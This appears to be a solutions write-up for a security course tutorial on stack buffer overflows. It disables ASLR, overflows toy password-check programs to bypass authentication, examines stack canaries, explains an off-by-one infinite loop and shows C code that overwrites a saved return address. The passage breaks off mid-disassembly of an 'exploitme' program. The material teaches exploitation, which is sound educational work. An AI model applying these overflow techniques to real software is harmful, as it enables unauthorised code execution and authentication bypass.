Tutorial 04 Solutions

We begin with the environment configuration to disable address space randomisation.

	admin@kali:~/SecurityClass/Tutorial-04$ sudo cat /proc/sys/kernel/randomize_va_space
	2
	admin@kali:~/SecurityClass/Tutorial-04$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
	0
	admin@kali:~/SecurityClass/Tutorial-04$ sudo cat /proc/sys/kernel/randomize_va_space
	0


Notes for 4.3

	We compile the program without stack protections. We can execute the program with a test argument and with the good argument.

		admin@kali:~/SecurityClass/Tutorial-04/4.2$ gcc -g -fno-stack-protector -o password password.c
		admin@kali:~/SecurityClass/Tutorial-04/4.2$ ./password test
		bad password!
		admin@kali:~/SecurityClass/Tutorial-04/4.2$ ./password good
		access granted

	We can try to put longer passwords to excess the buffer size.


		admin@kali:~/SecurityClass/Tutorial-04/4.2$ ./password testtesttesttest
		bad password!
		admin@kali:~/SecurityClass/Tutorial-04/4.2$ ./password testtesttesttesttest
		bad password!
		access granted
		admin@kali:~/SecurityClass/Tutorial-04/4.2$ ./password testtesttesttesttesttest
		bad password!
		access granted
		admin@kali:~/SecurityClass/Tutorial-04/4.2$ ./password testtesttesttesttesttesttest
		bad password!
		Segmentation fault

	It looks like bellow 16 chars, we stay within the buffer. Between 20 and 24 chars, we overwrite the buffer and the flag.
	Above 28 chars, we start writing over the stack frame and cause a buffer overflow.


Notes for 4.4

	We compile the program without stack protectors and test the program with the same values as before.

		admin@kali:~/SecurityClass/Tutorial-04/4.3$ gcc -g -fstack-protector -o password password.c
		admin@kali:~/SecurityClass/Tutorial-04/4.3$ ./password test
		bad password!
		admin@kali:~/SecurityClass/Tutorial-04/4.3$ ./password good
		access granted
		admin@kali:~/SecurityClass/Tutorial-04/4.3$ ./password testtesttesttest
		bad password!
		admin@kali:~/SecurityClass/Tutorial-04/4.3$ ./password testtesttesttesttest
		bad password!
		*** stack smashing detected ***: <unknown> terminated
		Aborted
		admin@kali:~/SecurityClass/Tutorial-04/4.3$ ./password testtesttesttesttesttest
		bad password!
		*** stack smashing detected ***: <unknown> terminated
		Aborted
		admin@kali:~/SecurityClass/Tutorial-04/4.3$ ./password testtesttesttesttesttesttest
		bad password!
		*** stack smashing detected ***: <unknown> terminated
		Aborted

	We see that above 20 chars, as soon as we start writing after the size of the buffer,
	we trigger the stack protectors and the program is stopped.

	Let's now compare the machine instructions for both programs and see what changed with and without stack protectors.
	We need to disassemble the function check_authentification and not the main function
	as it is where the buffer is and where there is a risk of buffer overflow.

		admin@kali:~/SecurityClass/Tutorial-04/4.2$ gdb -q password
		Reading symbols from password...
		(gdb) run AAAA
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.2/password AAAA
		bad password!
		[Inferior 1 (process 2121) exited normally]
		(gdb) disass check_authentification
		Dump of assembler code for function check_authentification:
		   0x004011b9 <+0>:     push   %ebp
		   0x004011ba <+1>:     mov    %esp,%ebp
		   0x004011bc <+3>:     push   %ebx
		   0x004011bd <+4>:     sub    $0x24,%esp
		   0x004011c0 <+7>:     call   0x4010c0 <__x86.get_pc_thunk.bx>
		   0x004011c5 <+12>:    add    $0x2e3b,%ebx
		   0x004011cb <+18>:    movl   $0x0,-0xc(%ebp)
		   0x004011d2 <+25>:    sub    $0x8,%esp
		   0x004011d5 <+28>:    pushl  0x8(%ebp)
		   0x004011d8 <+31>:    lea    -0x1c(%ebp),%eax
		   0x004011db <+34>:    push   %eax
		   0x004011dc <+35>:    call   0x401040 <strcpy@plt>
		   0x004011e1 <+40>:    add    $0x10,%esp
		   0x004011e4 <+43>:    sub    $0x8,%esp
		   0x004011e7 <+46>:    lea    -0x1ff8(%ebx),%eax
		   0x004011ed <+52>:    push   %eax
		   0x004011ee <+53>:    lea    -0x1c(%ebp),%eax
		   0x004011f1 <+56>:    push   %eax
		   0x004011f2 <+57>:    call   0x401030 <strcmp@plt>
		   0x004011f7 <+62>:    add    $0x10,%esp
		   0x004011fa <+65>:    test   %eax,%eax
		   0x004011fc <+67>:    jne    0x401207 <check_authentification+78>
		   0x004011fe <+69>:    movl   $0x1,-0xc(%ebp)
		   0x00401205 <+76>:    jmp    0x401219 <check_authentification+96>
		   0x00401207 <+78>:    sub    $0xc,%esp
		   0x0040120a <+81>:    lea    -0x1ff3(%ebx),%eax
		   0x00401210 <+87>:    push   %eax
		   0x00401211 <+88>:    call   0x401050 <puts@plt>
		   0x00401216 <+93>:    add    $0x10,%esp
		   0x00401219 <+96>:    mov    -0xc(%ebp),%eax
		   0x0040121c <+99>:    mov    -0x4(%ebp),%ebx
		   0x0040121f <+102>:   leave
		   0x00401220 <+103>:   ret
		End of assembler dump.

		admin@kali:~/SecurityClass/Tutorial-04/4.3$ gdb -q password
		Reading symbols from password...
		(gdb) run AAAA
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.3/password AAAA
		bad password!
		[Inferior 1 (process 1279) exited normally]
		(gdb) disass check_authentification
		Dump of assembler code for function check_authentification:
		   0x004011c9 <+0>:     push   %ebp
		   0x004011ca <+1>:     mov    %esp,%ebp
		   0x004011cc <+3>:     push   %ebx
		   0x004011cd <+4>:     sub    $0x34,%esp
		   0x004011d0 <+7>:     call   0x4010d0 <__x86.get_pc_thunk.bx>
		   0x004011d5 <+12>:    add    $0x2e2b,%ebx
		   0x004011db <+18>:    mov    0x8(%ebp),%eax
		   0x004011de <+21>:    mov    %eax,-0x2c(%ebp)
		   0x004011e1 <+24>:    mov    %gs:0x14,%eax
		   0x004011e7 <+30>:    mov    %eax,-0xc(%ebp)
		   0x004011ea <+33>:    xor    %eax,%eax
		   0x004011ec <+35>:    movl   $0x0,-0x20(%ebp)
		   0x004011f3 <+42>:    sub    $0x8,%esp
		   0x004011f6 <+45>:    pushl  -0x2c(%ebp)
		   0x004011f9 <+48>:    lea    -0x1c(%ebp),%eax
		   0x004011fc <+51>:    push   %eax
		   0x004011fd <+52>:    call   0x401050 <strcpy@plt>
		   0x00401202 <+57>:    add    $0x10,%esp
		   0x00401205 <+60>:    sub    $0x8,%esp
		   0x00401208 <+63>:    lea    -0x1ff8(%ebx),%eax
		   0x0040120e <+69>:    push   %eax
		   0x0040120f <+70>:    lea    -0x1c(%ebp),%eax
		   0x00401212 <+73>:    push   %eax
		   0x00401213 <+74>:    call   0x401030 <strcmp@plt>
		   0x00401218 <+79>:    add    $0x10,%esp
		   0x0040121b <+82>:    test   %eax,%eax
		   0x0040121d <+84>:    jne    0x401228 <check_authentification+95>
		   0x0040121f <+86>:    movl   $0x1,-0x20(%ebp)
		   0x00401226 <+93>:    jmp    0x40123a <check_authentification+113>
		   0x00401228 <+95>:    sub    $0xc,%esp
		   0x0040122b <+98>:    lea    -0x1ff3(%ebx),%eax
		   0x00401231 <+104>:   push   %eax
		   0x00401232 <+105>:   call   0x401060 <puts@plt>
		   0x00401237 <+110>:   add    $0x10,%esp
		   0x0040123a <+113>:   mov    -0x20(%ebp),%eax
		   0x0040123d <+116>:   mov    -0xc(%ebp),%edx
		   0x00401240 <+119>:   xor    %gs:0x14,%edx
		   0x00401247 <+126>:   je     0x40124e <check_authentification+133>
		   0x00401249 <+128>:   call   0x401340 <__stack_chk_fail_local>
		   0x0040124e <+133>:   mov    -0x4(%ebp),%ebx
		   0x00401251 <+136>:   leave
		   0x00401252 <+137>:   ret
		End of assembler dump.

	When we compare the machine instructions, we see that the program with stack protectors contains a few more instructions,
	between 0x004011db and 0x004011ea, and between 0x00401240 and 0x00401249. We see that both parts use the special register gs.
	There is a call at address 0x00401249 to a special function that seems implicated in the protection.
	We look now at the content of the stack for both programs after the call to strcpy.

		(gdb) b *0x4011e1
		Breakpoint 1 at 0x4011e1: file password.c, line 7.
		(gdb) run AAAA
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.2/password AAAA

		Breakpoint 1, 0x004011e1 in check_authentification (password=0xbffff510 "AAAA")
		    at password.c:7
		7         strcpy(password_buffer,password);
		(gdb) x/12xw password_buffer
		0xbffff26c:     0x41414141      0xb7fe6200      0xb7fb8000      0x00000000
		0xbffff27c:     0x00000000      0xb7fb83fc      0x00404000      0xbffff2a8
		0xbffff28c:     0x0040126c      0xbffff510      0xbffff354      0xbffff360

		(gdb) b *0x401202
		Breakpoint 1 at 0x401202: file password.c, line 7.
		(gdb) run AAAA
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.3/password AAAA

		Breakpoint 1, 0x00401202 in check_authentification (password=0xbffff52e "AAAA")
		    at password.c:7
		7         strcpy(password_buffer,password);
		(gdb) x/12xw password_buffer
		0xbffff28c:     0x41414141      0xb7fe6200      0xb7fb8000      0x00000000
		0xbffff29c:     0xd3e8e400      0xb7fb83fc      0x00404000      0xbffff2c8
		0xbffff2ac:     0x0040129e      0xbffff52e      0xbffff374      0xbffff380

	Looking at the memory, we can see that other than small differences in the addresses the only difference is in 4 bytes
	that are null without stack protector and have a random value with stack protector. If we run again, we see that these values
	change at each execution. This looks like a canary protection, that places a special value on the boundary of the buffer and
	add code to check that this value doesn't change during the execution of the program.

	We look now at the program reordered. We compile this program using different compilers.
	We look for one that doesn't have the vulnerability.

		admin@kali:~/SecurityClass/Tutorial-04/4.3$ gcc -g -fno-stack-protector -o reordered reordered.c
		admin@kali:~/SecurityClass/Tutorial-04/4.3$ ./reordered testtesttesttesttest
		bad password!
		access granted
		admin@kali:~/SecurityClass/Tutorial-04/4.3$ clang -g -fno-stack-protector -o reordered reordered.c
		admin@kali:~/SecurityClass/Tutorial-04/4.3$ ./reordered testtesttesttesttest
		bad password!

	We see that using gcc the vulnerability is still there, but not using clang. We open the program in gdb to see the difference.

		admin@kali:~/SecurityClass/Tutorial-04/4.3$ gdb -q reordered
		Reading symbols from reordered...
		(gdb) run AAAA
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.3/reordered AAAA
		bad password!
		[Inferior 1 (process 1452) exited normally]
		(gdb) disass check_authentification
		Dump of assembler code for function check_authentification:
		   0x08049190 <+0>:     push   %ebp
		   0x08049191 <+1>:     mov    %esp,%ebp
		   0x08049193 <+3>:     push   %esi
		   0x08049194 <+4>:     sub    $0x34,%esp
		   0x08049197 <+7>:     mov    0x8(%ebp),%eax
		   0x0804919a <+10>:    lea    -0x14(%ebp),%ecx
		   0x0804919d <+13>:    movl   $0x0,-0x18(%ebp)
		   0x080491a4 <+20>:    mov    0x8(%ebp),%edx
		   0x080491a7 <+23>:    mov    %esp,%esi
		   0x080491a9 <+25>:    mov    %edx,0x4(%esi)
		   0x080491ac <+28>:    mov    %ecx,(%esi)
		   0x080491ae <+30>:    mov    %eax,-0x1c(%ebp)
		   0x080491b1 <+33>:    mov    %ecx,-0x20(%ebp)
		   0x080491b4 <+36>:    call   0x8049050 <strcpy@plt>
		   0x080491b9 <+41>:    mov    %esp,%ecx
		   0x080491bb <+43>:    mov    -0x20(%ebp),%edx
		   0x080491be <+46>:    mov    %edx,(%ecx)
		   0x080491c0 <+48>:    movl   $0x804a008,0x4(%ecx)
		   0x080491c7 <+55>:    mov    %eax,-0x24(%ebp)
		   0x080491ca <+58>:    call   0x8049030 <strcmp@plt>
		   0x080491cf <+63>:    cmp    $0x0,%eax
		   0x080491d2 <+66>:    jne    0x80491e4 <check_authentification+84>
		   0x080491d8 <+72>:    movl   $0x1,-0x18(%ebp)
		   0x080491df <+79>:    jmp    0x80491f5 <check_authentification+101>
		   0x080491e4 <+84>:    lea    0x804a00d,%eax
		   0x080491ea <+90>:    mov    %eax,(%esp)
		   0x080491ed <+93>:    call   0x8049040 <printf@plt>
		   0x080491f2 <+98>:    mov    %eax,-0x28(%ebp)
		   0x080491f5 <+101>:   mov    -0x18(%ebp),%eax
		   0x080491f8 <+104>:   add    $0x34,%esp
		   0x080491fb <+107>:   pop    %esi
		   0x080491fc <+108>:   pop    %ebp
		   0x080491fd <+109>:   ret
		End of assembler dump.
		(gdb) b *0x80491b9
		Breakpoint 1 at 0x80491b9: file reordered.c, line 8.
		(gdb) run AAAA
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.3/reordered AAAA

		Breakpoint 1, check_authentification (password=0xbffff50f "AAAA") at reordered.c:8
		8         if(strcmp(password_buffer,"good")==0) {auth_flag = 1;}
		(gdb) x/12xw password_buffer
		0xbffff284:     0x41414141      0x00000000      0x080492cb      0x00000002
		0xbffff294:     0xb7fb8000      0xbffff2b8      0x0804924e      0xbffff50f
		0xbffff2a4:     0x00000000      0x00000000      0x00000002      0xbffff354

	Using the same steps as previously, we see that there is less memory between the buffer and the stack frame.
	Probably the flag is placed after the buffer instead of before and we can not overflow into it to provoke the exploit.


Notes for 4.5

	We compile the program and test different inputs

		admin@kali:~/SecurityClass/Tutorial-04/4.4$ gcc -g -o simple-loop simple-loop.c
		admin@kali:~/SecurityClass/Tutorial-04/4.4$ ./simple-loop test
		admin@kali:~/SecurityClass/Tutorial-04/4.4$ ./simple-loop 0123456789abcdef
		^C

	We see that with input 0123456789abcdef we have un infinite loop. We open gdb to inspect what happens.

		admin@kali:~/SecurityClass/Tutorial-04/4.4$ gdb -q simple-loop
		Reading symbols from simple-loop...
		(gdb) run test
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.4/simple-loop test
		[Inferior 1 (process 1508) exited normally]
		(gdb) disass main
		Dump of assembler code for function main:
		   0x004011c5 <+0>:     push   %ebp
		   0x004011c6 <+1>:     mov    %esp,%ebp
		   0x004011c8 <+3>:     call   0x4011ea <__x86.get_pc_thunk.ax>
		   0x004011cd <+8>:     add    $0x2e33,%eax
		   0x004011d2 <+13>:    mov    0xc(%ebp),%eax
		   0x004011d5 <+16>:    add    $0x4,%eax
		   0x004011d8 <+19>:    mov    (%eax),%eax
		   0x004011da <+21>:    push   %eax
		   0x004011db <+22>:    call   0x401189 <func>
		   0x004011e0 <+27>:    add    $0x4,%esp
		   0x004011e3 <+30>:    mov    $0x0,%eax
		   0x004011e8 <+35>:    leave
		   0x004011e9 <+36>:    ret
		End of assembler dump.
		(gdb) disass func
		Dump of assembler code for function func:
		   0x00401189 <+0>:     push   %ebp
		   0x0040118a <+1>:     mov    %esp,%ebp
		   0x0040118c <+3>:     sub    $0x20,%esp
		   0x0040118f <+6>:     call   0x4011ea <__x86.get_pc_thunk.ax>
		   0x00401194 <+11>:    add    $0x2e6c,%eax
		   0x00401199 <+16>:    movl   $0x0,-0x4(%ebp)
		   0x004011a0 <+23>:    jmp    0x4011bb <func+50>
		   0x004011a2 <+25>:    mov    -0x4(%ebp),%edx
		   0x004011a5 <+28>:    mov    0x8(%ebp),%eax
		   0x004011a8 <+31>:    add    %edx,%eax
		   0x004011aa <+33>:    movzbl (%eax),%eax
		   0x004011ad <+36>:    lea    -0x14(%ebp),%ecx
		   0x004011b0 <+39>:    mov    -0x4(%ebp),%edx
		   0x004011b3 <+42>:    add    %ecx,%edx
		   0x004011b5 <+44>:    mov    %al,(%edx)
		   0x004011b7 <+46>:    addl   $0x1,-0x4(%ebp)
		   0x004011bb <+50>:    cmpl   $0x10,-0x4(%ebp)
		   0x004011bf <+54>:    jle    0x4011a2 <func+25>
		   0x004011c1 <+56>:    nop
		   0x004011c2 <+57>:    nop
		   0x004011c3 <+58>:    leave
		   0x004011c4 <+59>:    ret
		End of assembler dump.

	We see in function func that we have a counter variable at -0x4(%ebp) initialised at 0 at 0x00401199,
	used in comparison of loop at 0x004011bb and incremented by 1 at 0x004011b7.
	The loop runs until the variable gets over 16. We put a breakpoint before the comparison to observe what happens.

		(gdb) b *0x4011bb
		Breakpoint 1 at 0x4011bb: file simple-loop.c, line 6.
		(gdb) r 0123456789abcdef
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.4/simple-loop 0123456789abcdef

		Breakpoint 1, 0x004011bb in func (str=0xbffff501 "0123456789abcdef") at simple-loop.c:6
		6         for (i=0;i<=16;i++) {
		(gdb) x/8xw buf
		0xbffff288:     0xbffff350      0x0040120d      0xb7fe62d0      0x00000000
		0xbffff298:     0x00000000      0xbffff2a8      0x004011e0      0xbffff501
		(gdb) c
		Continuing.

		Breakpoint 1, 0x004011bb in func (str=0xbffff501 "0123456789abcdef") at simple-loop.c:6
		6         for (i=0;i<=16;i++) {
		(gdb) x/8xw buf
		0xbffff288:     0xbffff330      0x0040120d      0xb7fe62d0      0x00000000
		0xbffff298:     0x00000001      0xbffff2a8      0x004011e0      0xbffff501
		Breakpoint 1, 0x004011bb in func (str=0xbffff501 "0123456789abcdef") at simple-loop.c:6
		6         for (i=0;i<=16;i++) {
		(gdb) x/8xw buf
		0xbffff288:     0xbfff3130      0x0040120d      0xb7fe62d0      0x00000000
		0xbffff298:     0x00000002      0xbffff2a8      0x004011e0      0xbffff501
		(gdb) c
		Continuing.

		Breakpoint 1, 0x004011bb in func (str=0xbffff501 "0123456789abcdef") at simple-loop.c:6
		6         for (i=0;i<=16;i++) {
		(gdb) x/8xw buf
		0xbffff288:     0xbf323130      0x0040120d      0xb7fe62d0      0x00000000
		0xbffff298:     0x00000003      0xbffff2a8      0x004011e0      0xbffff501

	We see that the buffer is slowly filled with our input. We also see the counter variable increasing by one at address 0xbffff298.
	We continue until the supposed end of the loop.

		(gdb) c
		Continuing.

		Breakpoint 1, 0x004011bb in func (str=0xbffff501 "0123456789abcdef") at simple-loop.c:6
		6         for (i=0;i<=16;i++) {
		(gdb) x/8xw buf
		0xbffff288:     0x33323130      0x37363534      0x62613938      0x66656463
		0xbffff298:     0x00000010      0xbffff2a8      0x004011e0      0xbffff501
		(gdb) c
		Continuing.

		Breakpoint 1, 0x004011bb in func (str=0xbffff501 "0123456789abcdef") at simple-loop.c:6
		6         for (i=0;i<=16;i++) {
		(gdb) x/8xw buf
		0xbffff288:     0x33323130      0x37363534      0x62613938      0x66656463
		0xbffff298:     0x00000001      0xbffff2a8      0x004011e0      0xbffff501
		(gdb) c
		Continuing.

		Breakpoint 1, 0x004011bb in func (str=0xbffff501 "0123456789abcdef") at simple-loop.c:6
		6         for (i=0;i<=16;i++) {
		(gdb) x/8xw buf
		0xbffff288:     0x33323130      0x37363534      0x62613938      0x66656463
		0xbffff298:     0x00000002      0xbffff2a8      0x004011e0      0xbffff501

	We see here that the whole buffer was filled and the counter variable was at 16.
	However since we have an off-by-one error, we still run the loop again. The program looks for the next value in the buffer,
	the null terminator, and writes it at the next address: the counter variable.
	It is then increased by one and the new value for the counter variable is 1.
	The loop now starts again from 1 until 16 over and over again, an infinite loop.

	If we compile with clang, we observe the same behavior at first.

		admin@kali:~/SecurityClass/Tutorial-04/4.4$ clang -g -o simple-loop simple-loop.c
		admin@kali:~/SecurityClass/Tutorial-04/4.4$ ./simple-loop 0123456789abcdef
		^C

	However, if we reorder the declaration of variables (buf before i) in the source code,
	we observe that the behavior is the same if compiled with gcc but we don't observe an infinite loop if compiled with clang.
	Like before, if the variables are reordered clang moves the counter variable after the buffer instead of before and we can't overwrite it.

		admin@kali:~/SecurityClass/Tutorial-04/4.4$ nano simple-loop.c
		admin@kali:~/SecurityClass/Tutorial-04/4.4$ clang -g -o simple-loop simple-loop.c
		admin@kali:~/SecurityClass/Tutorial-04/4.4$ ./simple-loop 0123456789abcdef
		admin@kali:~/SecurityClass/Tutorial-04/4.4$ gcc -g -o simple-loop simple-loop.c
		admin@kali:~/SecurityClass/Tutorial-04/4.4$ ./simple-loop 0123456789abcdef
		^C


Notes for 4.6

	We start by compiling the program, open it in gdb and disassemble its functions.

		admin@kali:~/SecurityClass/Tutorial-04/4.5$ gcc -g -o loop loop.c
		admin@kali:~/SecurityClass/Tutorial-04/4.5$ gdb -q loop
		Reading symbols from loop...
		(gdb) run
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.5/loop
		[Inferior 1 (process 1696) exited normally]
		(gdb) disass main
		Dump of assembler code for function main:
		   0x004011e4 <+0>:     lea    0x4(%esp),%ecx
		   0x004011e8 <+4>:     and    $0xfffffff0,%esp
		   0x004011eb <+7>:     pushl  -0x4(%ecx)
		   0x004011ee <+10>:    push   %ebp
		   0x004011ef <+11>:    mov    %esp,%ebp
		   0x004011f1 <+13>:    push   %ebx
		   0x004011f2 <+14>:    push   %ecx
		   0x004011f3 <+15>:    sub    $0x10,%esp
		   0x004011f6 <+18>:    call   0x4010c0 <__x86.get_pc_thunk.bx>
		   0x004011fb <+23>:    add    $0x2e05,%ebx
		   0x00401201 <+29>:    sub    $0xc,%esp
		   0x00401204 <+32>:    push   $0x20
		   0x00401206 <+34>:    call   0x401040 <malloc@plt>
		   0x0040120b <+39>:    add    $0x10,%esp
		   0x0040120e <+42>:    mov    %eax,-0xc(%ebp)
		   0x00401211 <+45>:    sub    $0x4,%esp
		   0x00401214 <+48>:    push   $0x20
		   0x00401216 <+50>:    push   $0xffffff90
		   0x00401218 <+52>:    pushl  -0xc(%ebp)
		   0x0040121b <+55>:    call   0x401060 <memset@plt>
		   0x00401220 <+60>:    add    $0x10,%esp
		   0x00401223 <+63>:    sub    $0xc,%esp
		   0x00401226 <+66>:    pushl  -0xc(%ebp)
		   0x00401229 <+69>:    call   0x4011b9 <foo>
		   0x0040122e <+74>:    add    $0x10,%esp
		   0x00401231 <+77>:    mov    $0x0,%eax
		   0x00401236 <+82>:    lea    -0x8(%ebp),%esp
		   0x00401239 <+85>:    pop    %ecx
		   0x0040123a <+86>:    pop    %ebx
		   0x0040123b <+87>:    pop    %ebp
		   0x0040123c <+88>:    lea    -0x4(%ecx),%esp
		   0x0040123f <+91>:    ret
		End of assembler dump.
		(gdb) disass foo
		Dump of assembler code for function foo:
		   0x004011b9 <+0>:     push   %ebp
		   0x004011ba <+1>:     mov    %esp,%ebp
		   0x004011bc <+3>:     push   %ebx
		   0x004011bd <+4>:     sub    $0x24,%esp
		   0x004011c0 <+7>:     call   0x401240 <__x86.get_pc_thunk.ax>
		   0x004011c5 <+12>:    add    $0x2e3b,%eax
		   0x004011ca <+17>:    sub    $0x8,%esp
		   0x004011cd <+20>:    pushl  0x8(%ebp)
		   0x004011d0 <+23>:    lea    -0x28(%ebp),%edx
		   0x004011d3 <+26>:    push   %edx
		   0x004011d4 <+27>:    mov    %eax,%ebx
		   0x004011d6 <+29>:    call   0x401030 <strcpy@plt>
		   0x004011db <+34>:    add    $0x10,%esp
		   0x004011de <+37>:    nop
		   0x004011df <+38>:    mov    -0x4(%ebp),%ebx
		   0x004011e2 <+41>:    leave
		   0x004011e3 <+42>:    ret
		End of assembler dump.

	We see that the next instruction after the call to the foo function is 0x0040122e.
	Inside foo we need to perform a buffer overflow to modified the saved eip 0x0040122e to the call of the foo function 0x00401229.
	We first setup a breakpoint after the call to strcpy in foo to check where is the saved eip in foo and what size of the buffer we need.

		(gdb) b *0x4011db
		Breakpoint 1 at 0x4011db: file loop.c, line 10.
		(gdb) run
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.5/loop

		Breakpoint 1, 0x004011db in foo (buffer=0x405160 '\220' <repeats 32 times>) at loop.c:10
		10        strcpy(newbuffer, buffer);
		(gdb) x/16xw newbuffer
		0xbffff260:     0x90909090      0x90909090      0x90909090      0x90909090
		0xbffff270:     0x90909090      0x90909090      0x90909090      0x90909090
		0xbffff280:     0x00405100      0x00404000      0xbffff2b8      0x0040122e
		0xbffff290:     0x00405160      0xffffff90      0x00000020      0x004011fb

	We see the 32 bytes of the buffer, 8 bytes of memory, then the 4 bytes of the saved EBP and the 4 bytes of the next eip.
	This means we need to modify the TARGET value to 48 total bytes, and set the 4 last bytes to the call of the foo function 0x00401229.
	We modify the source code accordingly.

		#include "stdlib.h"
		#include "string.h"


		// YOU CAN CHANGE THIS VALUE!
		#define TARGET 48

		void foo(char * buffer){
		  char newbuffer[32];
		  strcpy(newbuffer, buffer);
		}

		int main() {
		  char * buffer;
		  buffer = malloc(sizeof(char)*TARGET);
		  memset(buffer, '\x90', 44);

		  buffer[47] = 0x00;
		  buffer[46] = 0x40;
		  buffer[45] = 0x12;
		  buffer[44] = 0x29;
		  // You can write code here to change the value of "buffer"
		  foo(buffer);
		  return 0;
		}

	We compile this new program, open it in gdb and disassemble its functions.
	We observe that we jumped to the address we specified,
	but due to the new instructions in the source code the correct address changed.

		admin@kali:~/SecurityClass/Tutorial-04/4.5$ gcc -g -o loop loop.c
		admin@kali:~/SecurityClass/Tutorial-04/4.5$ gdb -q loop
		Reading symbols from loop...
		(gdb) run
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.5/loop

		Program received signal SIGSEGV, Segmentation fault.
		main () at loop.c:19
		19        buffer[46] = 0x40;
		(gdb) disass main
		Dump of assembler code for function main:
		   0x004011e4 <+0>:     lea    0x4(%esp),%ecx
		   0x004011e8 <+4>:     and    $0xfffffff0,%esp
		   0x004011eb <+7>:     pushl  -0x4(%ecx)
		   0x004011ee <+10>:    push   %ebp
		   0x004011ef <+11>:    mov    %esp,%ebp
		   0x004011f1 <+13>:    push   %ebx
		   0x004011f2 <+14>:    push   %ecx
		   0x004011f3 <+15>:    sub    $0x10,%esp
		   0x004011f6 <+18>:    call   0x4010c0 <__x86.get_pc_thunk.bx>
		   0x004011fb <+23>:    add    $0x2e05,%ebx
		   0x00401201 <+29>:    sub    $0xc,%esp
		   0x00401204 <+32>:    push   $0x30
		   0x00401206 <+34>:    call   0x401040 <malloc@plt>
		   0x0040120b <+39>:    add    $0x10,%esp
		   0x0040120e <+42>:    mov    %eax,-0xc(%ebp)
		   0x00401211 <+45>:    sub    $0x4,%esp
		   0x00401214 <+48>:    push   $0x2c
		   0x00401216 <+50>:    push   $0xffffff90
		   0x00401218 <+52>:    pushl  -0xc(%ebp)
		   0x0040121b <+55>:    call   0x401060 <memset@plt>
		   0x00401220 <+60>:    add    $0x10,%esp
		   0x00401223 <+63>:    mov    -0xc(%ebp),%eax
		   0x00401226 <+66>:    add    $0x2f,%eax
		   0x00401229 <+69>:    movb   $0x0,(%eax)
		=> 0x0040122c <+72>:    mov    -0xc(%ebp),%eax
		   0x0040122f <+75>:    add    $0x2e,%eax
		   0x00401232 <+78>:    movb   $0x40,(%eax)
		   0x00401235 <+81>:    mov    -0xc(%ebp),%eax
		   0x00401238 <+84>:    add    $0x2d,%eax
		   0x0040123b <+87>:    movb   $0x12,(%eax)
		   0x0040123e <+90>:    mov    -0xc(%ebp),%eax
		   0x00401241 <+93>:    add    $0x2c,%eax
		   0x00401244 <+96>:    movb   $0x29,(%eax)
		   0x00401247 <+99>:    sub    $0xc,%esp
		   0x0040124a <+102>:   pushl  -0xc(%ebp)
		   0x0040124d <+105>:   call   0x4011b9 <foo>
		   0x00401252 <+110>:   add    $0x10,%esp
		   0x00401255 <+113>:   mov    $0x0,%eax
		   0x0040125a <+118>:   lea    -0x8(%ebp),%esp
		   0x0040125d <+121>:   pop    %ecx
		   0x0040125e <+122>:   pop    %ebx
		   0x0040125f <+123>:   pop    %ebp
		   0x00401260 <+124>:   lea    -0x4(%ecx),%esp
		   0x00401263 <+127>:   ret
		End of assembler dump.

	We modify again the source code to input the right address to the call of foo: 0x0040124d.

		#include "stdlib.h"
		#include "string.h"


		// YOU CAN CHANGE THIS VALUE!
		#define TARGET 48

		void foo(char * buffer){
		  char newbuffer[32];
		  strcpy(newbuffer, buffer);
		}

		int main() {
		  char * buffer;
		  buffer = malloc(sizeof(char)*TARGET);
		  memset(buffer, '\x90', 44);

		  buffer[47] = 0x00;
		  buffer[46] = 0x40;
		  buffer[45] = 0x12;
		  buffer[44] = 0x4d;
		  // You can write code here to change the value of "buffer"
		  foo(buffer);
		  return 0;
		}

	We compile and run again, and we observe that the code runs in an infinite loop.

		admin@kali:~/SecurityClass/Tutorial-04/4.5$ gcc -g -o loop loop.c
		admin@kali:~/SecurityClass/Tutorial-04/4.5$ gdb -q loop
		Reading symbols from loop...
		(gdb) run
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.5/loop
		^C


Notes for 4.7

	We compile the program using clang, we open it in gdb and we disassemble its functions.

		admin@kali:~/SecurityClass/Tutorial-04/4.6$ clang -g -o exploitme exploitme.c
		admin@kali:~/SecurityClass/Tutorial-04/4.6$ gdb -q exploitme
		Reading symbols from exploitme...
		(gdb) run AAAA
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.6/exploitme AAAA
		[Inferior 1 (process 2134) exited normally]
		(gdb) disass main
		Dump of assembler code for function main:
		   0x080491d0 <+0>:     push   %ebp
		   0x080491d1 <+1>:     mov    %esp,%ebp
		   0x080491d3 <+3>:     sub    $0x18,%esp
		   0x080491d6 <+6>:     mov    0xc(%ebp),%eax
		   0x080491d9 <+9>:     mov    0x8(%ebp),%ecx
		   0x080491dc <+12>:    mov    0xc(%ebp),%edx
		   0x080491df <+15>:    mov    0x4(%edx),%edx
		   0x080491e2 <+18>:    mov    %edx,(%esp)
		   0x080491e5 <+21>:    mov    %eax,-0x4(%ebp)
		   0x080491e8 <+24>:    mov    %ecx,-0x8(%ebp)
		   0x080491eb <+27>:    call   0x8049160 <func>
		   0x080491f0 <+32>:    xor    %eax,%eax
		   0x080491f2 <+34>:    add    $0x18,%esp
		   0x080491f5 <+37>:    pop    %ebp
		   0x080491f6 <+38>:    ret
		End of assembler dump.
		(gdb) disass func
		Dump of assembler code for function func:
		   0x08049160 <+0>:     push   %ebp
		   0x08049161 <+1>:     mov    %esp,%ebp
		   0x08049163 <+3>:     sub    $0x108,%esp
		   0x08049169 <+9>:     mov    0x8(%ebp),%eax
		   0x0804916c <+12>:    movl   $0x0,-0x104(%ebp)
		   0x08049176 <+22>:    mov    %eax,-0x108(%ebp)
		   0x0804917c <+28>:    cmpl   $0x100,-0x104(%ebp)
		   0x08049186 <+38>:    jg     0x80491b9 <func+89>
		   0x0804918c <+44>:    mov    0x8(%ebp),%eax
		   0x0804918f <+47>:    mov    -0x104(%ebp),%ecx
		   0x08049195 <+53>:    mov    (%eax,%ecx,1),%dl
